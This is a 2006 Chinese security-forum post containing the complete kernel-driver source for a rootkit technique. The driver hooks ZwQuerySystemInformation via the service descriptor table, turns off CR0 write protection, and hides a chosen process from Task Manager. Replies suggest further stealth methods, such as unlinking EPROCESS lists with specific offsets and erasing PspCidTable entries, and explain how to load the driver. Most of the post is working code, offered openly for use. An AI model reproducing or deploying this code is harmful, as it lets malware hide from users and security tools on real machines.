[原创]Hook 内核ntoskrnl'sZwQuerySystemInformation隐藏任务管理器进程名-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]Hook 内核ntoskrnl'sZwQuerySystemInformation隐藏任务管理器进程名

发表于: 2006-12-21 18:56 29337

[原创]Hook 内核ntoskrnl'sZwQuerySystemInformation隐藏任务管理器进程名

qiweixue

2006-12-21 18:56

29337

原理:通过修改内核ntoskrnl的服务表结构体KeServiceDescriptorTable,计算机出ZwQuerySystemInformation的地址,
然后替换成自己的MyZwQuerySystemInformation,然后断掉过滤要隐藏的进程名.

网上hook ZwQuerySystemInformation隐藏进程的很多,但是大都是文字说明偏多,很多给出的代码不可以编译,所以自己参照了很多文章编译了成功了.

有一段取ZwQuerySystemInformation的服务指针,我是用的汇编写的.

文件输出是驱动文件SYS,加载它就可以隐藏所要的进程名了.不要拿来搞木马害我.

完整代码文件和编译好的都在附件中!

#include <ntddk.h>
#include <string.h>

VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject);
///////////////////定义本地结构体//////////////////////////////////////////
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};

struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};

///////////////声明Native API///////////////////////////////////////
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);

typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);

NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);

/////////////////定义ntoskrnl.exe的服务表结构////////////////////////////////////////////////
typedef struct _ServiceDescriptorEntry {
      unsigned int *ServiceTableBase;
      unsigned int *ServiceCounterTableBase;
      unsigned int NumberOfServices;
      unsigned char *ParamTableBase;
}ServiceDescriptorTableEntry, *PServiceDescriptorTableEntry;

////////////////////定义所用到的全局变量///////////////
extern PServiceDescriptorTableEntry KeServiceDescriptorTable;
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
unsigned long OldCr0;
UNICODE_STRING DeviceNameString;
UNICODE_STRING LinkDeviceNameString;

NTSTATUS DriverEntry (IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{

NTSTATUS status;
PDEVICE_OBJECT deviceObject;

RtlInitUnicodeString( &DeviceNameString, L"\\Device\\HideProcess" );
RtlInitUnicodeString( &LinkDeviceNameString,L"\\DosDevices\\HideProcess" );

KdPrint(("DriverEntry Enter............................\n"));

status = IoCreateDevice(
            DriverObject,
            0,
            &DeviceNameString,
            FILE_DEVICE_DISK_FILE_SYSTEM,
            FILE_DEVICE_SECURE_OPEN,
            FALSE,
            & deviceObject );

if (!NT_SUCCESS( status ))
{

      KdPrint(( "DriverEntry: Error creating control device object, status=%08x\n", status ));
      return status;
}

status = IoCreateSymbolicLink(
            (PUNICODE_STRING) &LinkDeviceNameString,
            (PUNICODE_STRING) &DeviceNameString
            );

if (!NT_SUCCESS(status))
{
      IoDeleteDevice(deviceObject);
      return status;
}

  DriverObject->DriverUnload=UnloadDriver;



//////////////////////Hook ZwQuerySystemInformation/////////////////////////////////////////////////

_asm{
      cli;
      mov eax,cr0
      mov OldCr0,eax
      and eax,0fffeffffh
      mov cr0,eax
}

_asm{

      mov    ecx, dword ptr [ZwQuerySystemInformation];
      mov    edx, [ecx+1];
      mov    eax, dword ptr [KeServiceDescriptorTable];
      mov    esi, [eax];
      mov    edx, [esi+edx*4];
      mov    dword ptr [OldZwQuerySystemInformation], edx
      mov    ecx, [ecx+1]
      mov    eax, [eax]
      mov    dword ptr [eax+ecx*4], offset MyZwQuerySystemInformation;

}
  _asm
{
      mov eax,OldCr0
      mov cr0,eax
      sti;
}

KdPrint(("Hook ZwQuerySystemInformation'status is Succeessfully "));

return status ;

}

VOID UnloadDriver(IN PDRIVER_OBJECT DriverObject)//卸载驱动程序和钩子
{
UNICODE_STRING uniWin32NameString;
UNICODE_STRING LinkNameString;
PDEVICE_OBJECT deviceObject;

//////////////////////UnHook ZwQuerySystemInformation/////////////////////////////////////////////////

_asm{
      cli;
      mov eax,cr0
      mov OldCr0,eax
      and eax,0fffeffffh
      mov cr0,eax
}

_asm{

      mov    ecx, dword ptr [ZwQuerySystemInformation];
      mov    edx, [ecx+1];
      mov    eax, dword ptr [KeServiceDescriptorTable];
      mov    esi, [eax];
      mov    ebx, dword ptr [OldZwQuerySystemInformation];
      mov    [esi+edx*4],ebx;
}

_asm
{
      mov eax,OldCr0
      mov cr0,eax
      sti;
}

KdPrint(("UnHookZwQuerySystemInformation'status is Succeessfully................... "));
deviceObject= DriverObject->DeviceObject;
IoDeleteSymbolicLink(&LinkDeviceNameString);
ASSERT(!deviceObject->AttachedDevice);
if ( deviceObject != NULL )
{
      IoDeleteDevice( deviceObject );
}

}

NTSTATUS MyZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength) //定义自己的Hook函数
{
NTSTATUS rc;

UNICODE_STRING process_name;
RtlInitUnicodeString(&process_name, L"taskmgr.exe");//改成自己要隐藏的进程名

rc = (OldZwQuerySystemInformation) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);

if(NT_SUCCESS(rc))
{
if(5 == SystemInformationClass)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);

while(curr)
{

                           if (RtlEqualUnicodeString(&process_name, &curr->ProcessName, 1))

{
                              KdPrint(("hide process'name taskmgr.exe"));

if(prev)
{
if(curr->NextEntryDelta)
{
prev->NextEntryDelta += curr->NextEntryDelta;
}
else
{
prev->NextEntryDelta = 0;
}
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
{
SystemInformation = NULL;
}
}

if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else
{
curr = NULL;
break;
}
}

if(curr != NULL)
{
prev = curr;
if(curr->NextEntryDelta)((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}

}
}
}
KdPrint(("HookZwQuerySystemInformation'status is Succeessfully................... "));

return rc;

}

////////////////////////makefile///////////////////////////////////////////////////

#
# DO NOT EDIT THIS FILE!!!  Edit .\sources. if you want to add a new source
# file to this component.  This file merely indirects to the real make file
# that is shared by all the components of Windows NT
#
!INCLUDE $(NTMAKEENV)\makefile.def
//////////////////////////////////////////////////////////////////////////

///////////////////////sources//////////////////////////////////////////////////
TARGETNAME=HookZwQuerySystemInformation
TARGETPATH=obj
TARGETTYPE=DRIVER

BROWSER_INFO=1

SOURCES=ZwQuerySystemInformation.c
/////////////////////////////////////////////////////////////////////////

环境xp,sp2 DDK2003 Build...
在其他平台先编译一边源代码.

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

hook zwquerysysteminformation.rar （167.80kb，699次下载）

收藏・31

免费・7

支持

最新回复 (33) 1 2 ▶
小虾雪币： 2384 活跃值： (766) 能力值： (RANK：410 ) 在线值：发帖 36 回帖 2248 粉丝 7 关注私信	小虾 10 2 楼驱动大牛，支持。 2006-12-21 19:00 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 3 楼最初由小虾发布驱动大牛，支持。战神兄我是菜鸟!: 过年赚个精华,,,鼓励下自己谢谢 2006-12-21 19:03 0
drwch 雪币： 222 活跃值： (10) 能力值： ( LV8，RANK：130 ) 在线值：发帖 11 回帖 234 粉丝 0 关注私信	drwch 3 4 楼支持，不过这样隐藏还不太够，可以进RING0的话，学学FUTO抹CIDTABLE也是不错的 2006-12-21 19:22 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 5 楼最初由 drwch* 发布* 支持，不过这样隐藏还不太够，可以进RING0的话，学学FUTO抹CIDTABLE也是不错的兄弟,我编译是SYS在ring0下,是通过ntoskel导出的dispatch服务表,替换这个Zwxxxx服务指针的. 不知道还有其他方法. 2006-12-21 19:26 0
thinkSJ 雪币： 196 活跃值： (135) 能力值： ( LV10，RANK：170 ) 在线值：发帖 9 回帖 611 粉丝 1 关注私信	thinkSJ 4 6 楼支持，对于3环的检测程序这个隐藏程序应该是足够了，对于0环检测的话，还得修改 2006-12-21 19:54 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 5 关注私信	shoooo 16 7 楼要从ZwQuerySystemInformation隐藏进程只要ActiveProcess断链就可以了得到进程的EPROCESS 2k的偏移是0xA0 xp和2k3是0x88 过去就是ActiveProcess链了 NP里来看来的 2006-12-21 20:09 0
thinkSJ 雪币： 196 活跃值： (135) 能力值： ( LV10，RANK：170 ) 在线值：发帖 9 回帖 611 粉丝 1 关注私信	thinkSJ 4 8 楼按照prince以前的说法ActiveProcess断链的方法都已经被用烂了，既然在0环下能用的东西就很多了，比如说PspCidTable就可以... 2006-12-21 20:15 0
wynney 雪币： 224 活跃值： (147) 能力值： ( LV9，RANK：970 ) 在线值：发帖 65 回帖 1109 粉丝 7 关注私信	wynney 24 9 楼继续讨论我学习：） 2006-12-21 20:17 0
xIkUg 雪币： 116 活跃值： (220) 能力值： ( LV12，RANK：370 ) 在线值：发帖 27 回帖 675 粉丝 4 关注私信	xIkUg 9 10 楼 PspCidTable有两份 2006-12-21 20:26 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 11 楼顶楼几的大bt.... 多谢指点... 2006-12-21 22:15 0
colboy 雪币： 214 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 371 粉丝 0 关注私信	colboy 12 楼太强~太强`~~~~ 2006-12-21 23:38 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 5 关注私信	shoooo 16 13 楼最初由 xIkUg* 发布* PspCidTable有两份传说中的第8个男人? 2006-12-22 08:58 0
prince 雪币： 603 活跃值： (617) 能力值： ( LV12，RANK：660 ) 在线值：发帖 51 回帖 1874 粉丝 8 关注私信	prince 16 14 楼隐藏进程断链最方便，也最容易被发现。不过楼主的修改SDT的方法来hook一些函数倒是很多rootkit用的手段。 2006-12-22 11:56 0
laomms 雪币： 560 活跃值： (359) 能力值： ( LV13，RANK：1370 ) 在线值：发帖 83 回帖 384 粉丝 8 关注私信	laomms 34 15 楼最近好象许多牛人在"冬眠"中醒来 2006-12-22 14:56 0
hzxhzx 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 10 粉丝 0 关注私信	hzxhzx 16 楼不知DELPHI如何调用这个SYS? 我直接用注册表方式加载测试了下...貌似没隐藏TASKMGR.EXE..... 2006-12-24 18:00 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 17 楼最初由 hzxhzx* 发布* 不知DELPHI如何调用这个SYS? 我直接用注册表方式加载测试了下...貌似没隐藏TASKMGR.EXE..... RtlInitUnicodeString(&process_name, L"taskmgr.exe");//改成自己要隐藏的进程名我没有做大小写转换了,忘了!这个注意! delphi调用它,用 OpenSCManager,CreateService ,StartService OpenService等加载驱动. xp sp2 平台的. 单实例运行..... 其他平台不行,我也不想在调试了.修改了... 修改驱动真麻烦. 在我的平台可以. 2006-12-24 19:51 0
北极星2003 雪币： 1852 活跃值： (504) 能力值： (RANK：1010 ) 在线值：发帖 86 回帖 1240 粉丝 12 关注私信	北极星2003 25 18 楼最初由 laomms* 发布* 最近好象许多牛人在"冬眠"中醒来春天快来了 2006-12-25 09:27 0
prince 雪币： 603 活跃值： (617) 能力值： ( LV12，RANK：660 ) 在线值：发帖 51 回帖 1874 粉丝 8 关注私信	prince 16 19 楼最初由北极星2003* 发布* 春天快来了怎么从来也不见你上MSN？ 2006-12-25 10:20 0
北极星2003 雪币： 1852 活跃值： (504) 能力值： (RANK：1010 ) 在线值：发帖 86 回帖 1240 粉丝 12 关注私信	北极星2003 25 20 楼最初由 prince* 发布* 怎么从来也不见你上MSN？前段时间去了西安，10多天，前几天刚回来 2006-12-25 10:27 0
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 37 回帖 519 粉丝 6 关注私信	hawking 12 21 楼不懂，占个位子学习一下 2006-12-26 12:10 0
nipcdll 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 89 粉丝 0 关注私信	nipcdll 22 楼要是可以通过PID或者进程名结合的方法隐藏就好了，呵呵 2006-12-29 10:43 0
beek 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	beek 23 楼 hook太脆弱了。。 2006-12-29 11:28 0
zhucheba 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 375 粉丝 0 关注私信	zhucheba 24 楼最初由 shoooo* 发布* 要从ZwQuerySystemInformation隐藏进程只要ActiveProcess断链就可以了得到进程的EPROCESS 2k的偏移是0xA0 ........ 认真学习 2006-12-29 11:33 0
kagayaki 雪币： 1312 活跃值： (5164) 能力值： ( LV3，RANK：20 ) 在线值：发帖 174 回帖 1253 粉丝 25 关注私信	kagayaki 25 楼收藏!!!! 2007-5-26 03:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

qiweixue

发帖

1136

回帖

770

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (33) 1 2 ▶
小虾雪币： 2384 活跃值： (766) 能力值： (RANK：410 ) 在线值：发帖 36 回帖 2248 粉丝 7 关注私信	小虾 10 2 楼驱动大牛，支持。 2006-12-21 19:00 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 3 楼最初由小虾发布驱动大牛，支持。战神兄我是菜鸟!: 过年赚个精华,,,鼓励下自己谢谢 2006-12-21 19:03 0
drwch 雪币： 222 活跃值： (10) 能力值： ( LV8，RANK：130 ) 在线值：发帖 11 回帖 234 粉丝 0 关注私信	drwch 3 4 楼支持，不过这样隐藏还不太够，可以进RING0的话，学学FUTO抹CIDTABLE也是不错的 2006-12-21 19:22 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 5 楼最初由 drwch* 发布* 支持，不过这样隐藏还不太够，可以进RING0的话，学学FUTO抹CIDTABLE也是不错的兄弟,我编译是SYS在ring0下,是通过ntoskel导出的dispatch服务表,替换这个Zwxxxx服务指针的. 不知道还有其他方法. 2006-12-21 19:26 0
thinkSJ 雪币： 196 活跃值： (135) 能力值： ( LV10，RANK：170 ) 在线值：发帖 9 回帖 611 粉丝 1 关注私信	thinkSJ 4 6 楼支持，对于3环的检测程序这个隐藏程序应该是足够了，对于0环检测的话，还得修改 2006-12-21 19:54 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 5 关注私信	shoooo 16 7 楼要从ZwQuerySystemInformation隐藏进程只要ActiveProcess断链就可以了得到进程的EPROCESS 2k的偏移是0xA0 xp和2k3是0x88 过去就是ActiveProcess链了 NP里来看来的 2006-12-21 20:09 0
thinkSJ 雪币： 196 活跃值： (135) 能力值： ( LV10，RANK：170 ) 在线值：发帖 9 回帖 611 粉丝 1 关注私信	thinkSJ 4 8 楼按照prince以前的说法ActiveProcess断链的方法都已经被用烂了，既然在0环下能用的东西就很多了，比如说PspCidTable就可以... 2006-12-21 20:15 0
wynney 雪币： 224 活跃值： (147) 能力值： ( LV9，RANK：970 ) 在线值：发帖 65 回帖 1109 粉丝 7 关注私信	wynney 24 9 楼继续讨论我学习：） 2006-12-21 20:17 0
xIkUg 雪币： 116 活跃值： (220) 能力值： ( LV12，RANK：370 ) 在线值：发帖 27 回帖 675 粉丝 4 关注私信	xIkUg 9 10 楼 PspCidTable有两份 2006-12-21 20:26 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 11 楼顶楼几的大bt.... 多谢指点... 2006-12-21 22:15 0
colboy 雪币： 214 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 11 回帖 371 粉丝 0 关注私信	colboy 12 楼太强~太强`~~~~ 2006-12-21 23:38 0
shoooo 雪币： 398 活跃值： (343) 能力值： (RANK：650 ) 在线值：发帖 91 回帖 2169 粉丝 5 关注私信	shoooo 16 13 楼最初由 xIkUg* 发布* PspCidTable有两份传说中的第8个男人? 2006-12-22 08:58 0
prince 雪币： 603 活跃值： (617) 能力值： ( LV12，RANK：660 ) 在线值：发帖 51 回帖 1874 粉丝 8 关注私信	prince 16 14 楼隐藏进程断链最方便，也最容易被发现。不过楼主的修改SDT的方法来hook一些函数倒是很多rootkit用的手段。 2006-12-22 11:56 0
laomms 雪币： 560 活跃值： (359) 能力值： ( LV13，RANK：1370 ) 在线值：发帖 83 回帖 384 粉丝 8 关注私信	laomms 34 15 楼最近好象许多牛人在"冬眠"中醒来 2006-12-22 14:56 0
hzxhzx 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 10 粉丝 0 关注私信	hzxhzx 16 楼不知DELPHI如何调用这个SYS? 我直接用注册表方式加载测试了下...貌似没隐藏TASKMGR.EXE..... 2006-12-24 18:00 0
qiweixue 雪币： 258 活跃值： (230) 能力值： ( LV12，RANK：770 ) 在线值：发帖 47 回帖 1136 粉丝 3 关注私信	qiweixue 19 17 楼最初由 hzxhzx* 发布* 不知DELPHI如何调用这个SYS? 我直接用注册表方式加载测试了下...貌似没隐藏TASKMGR.EXE..... RtlInitUnicodeString(&process_name, L"taskmgr.exe");//改成自己要隐藏的进程名我没有做大小写转换了,忘了!这个注意! delphi调用它,用 OpenSCManager,CreateService ,StartService OpenService等加载驱动. xp sp2 平台的. 单实例运行..... 其他平台不行,我也不想在调试了.修改了... 修改驱动真麻烦. 在我的平台可以. 2006-12-24 19:51 0
北极星2003 雪币： 1852 活跃值： (504) 能力值： (RANK：1010 ) 在线值：发帖 86 回帖 1240 粉丝 12 关注私信	北极星2003 25 18 楼最初由 laomms* 发布* 最近好象许多牛人在"冬眠"中醒来春天快来了 2006-12-25 09:27 0
prince 雪币： 603 活跃值： (617) 能力值： ( LV12，RANK：660 ) 在线值：发帖 51 回帖 1874 粉丝 8 关注私信	prince 16 19 楼最初由北极星2003* 发布* 春天快来了怎么从来也不见你上MSN？ 2006-12-25 10:20 0
北极星2003 雪币： 1852 活跃值： (504) 能力值： (RANK：1010 ) 在线值：发帖 86 回帖 1240 粉丝 12 关注私信	北极星2003 25 20 楼最初由 prince* 发布* 怎么从来也不见你上MSN？前段时间去了西安，10多天，前几天刚回来 2006-12-25 10:27 0
hawking 雪币： 1969 活跃值： (46) 能力值： (RANK：550 ) 在线值：发帖 37 回帖 519 粉丝 6 关注私信	hawking 12 21 楼不懂，占个位子学习一下 2006-12-26 12:10 0
nipcdll 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 23 回帖 89 粉丝 0 关注私信	nipcdll 22 楼要是可以通过PID或者进程名结合的方法隐藏就好了，呵呵 2006-12-29 10:43 0
beek 雪币： 201 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	beek 23 楼 hook太脆弱了。。 2006-12-29 11:28 0
zhucheba 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 375 粉丝 0 关注私信	zhucheba 24 楼最初由 shoooo* 发布* 要从ZwQuerySystemInformation隐藏进程只要ActiveProcess断链就可以了得到进程的EPROCESS 2k的偏移是0xA0 ........ 认真学习 2006-12-29 11:33 0
kagayaki 雪币： 1312 活跃值： (5164) 能力值： ( LV3，RANK：20 ) 在线值：发帖 174 回帖 1253 粉丝 25 关注私信	kagayaki 25 楼收藏!!!! 2007-5-26 03:03 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复